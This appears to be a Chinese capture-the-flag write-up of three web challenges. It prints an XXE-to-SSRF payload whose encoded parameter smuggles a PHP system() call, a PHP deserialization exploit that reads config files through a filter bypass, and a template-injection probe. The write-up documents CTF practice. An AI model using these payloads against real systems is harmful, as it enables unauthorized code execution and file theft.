内容简介:根据URL可以猜测存在任意文件下载漏洞并且hash值为file的md5加密,根据提示下载源码在路由文件中发现几个关键点
Bad Injections
根据URL可以猜测存在任意文件下载漏洞并且hash值为file的md5加密,根据提示下载源码
在路由文件中发现几个关键点
跟进这个类发现存在XXE
这里想到还有一个只能通过SSRF才能访问到的admin,于是跟进admin文件发现存在代码执行
于是想到利用XXE来构造这个代码执行,这里要注意的是服务器出现 }
就会报 parser error : Invalid URI
,所以我们需要编码一下。最终payload
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "http://localhost/admin?rss=http://www.lovei.org/sitemap.xmlℴ=%6c%69%6e%6b%29%3b%7d%73%79%73%74%65%6d%28%22%63%61%74%20%2f%64%61%30%66%37%32%64%35%64%37%39%31%36%39%39%37%31%62%36%32%61%34%37%39%63%33%34%31%39%38%65%37%22%29%3b%2f%2f" >]> <root> <name>&xxe;</name> </root>
Vice
题目思路应该蛮明确反序列+SSRF,这里有几个限制所以我们使用file协议读文件, 127.0.0.2
绕过 127.0.0.1
的检测,然后将ip十进制编码绕过 .
检测最后进入URL编码
<?php class SHITS{ private $url; private $method; function __construct(){ $this->method = "doit"; $this->url = "file://2130706434/var/www/html/config%2ephp"; } } $a = new SHITS(); echo urlencode(serialize($a)); ?>
最终payload:
http://68.183.31.62:991/?gg=O%3A5%3A%22SHITS%22%3A2%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A43%3A%22file%3A%2F%2F2130706434%2Fvar%2Fwww%2Fhtml%2Fconfig%252ephp%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3B%7D
Super-easy web dog
这道题一开始没做出来,最后知道真相的我眼泪掉下来
看到这个之后果断跑去题目试了 {{$.Request}}
然后???然后这就出来了?眼泪掉了下来
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 你负责人工智能哪部分?人工那部分;知识图谱的构建主要靠人工还是机器?
- cocosdx接bugly,上传符号表,有一部分内容解析出来了, 另一部分没有解析出来
- GO的部分总结~
- MySQL基础部分总结
- python字典实例(部分)
- DDCTF2018 部分writeup
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Think Python
Allen B. Downey / O'Reilly Media / 2012-8-23 / GBP 29.99
Think Python is an introduction to Python programming for students with no programming experience. It starts with the most basic concepts of programming, and is carefully designed to define all terms ......一起来看看 《Think Python》 这本书的介绍吧!
XML、JSON 在线转换
在线XML、JSON转换工具
HSV CMYK 转换工具
HSV CMYK互换工具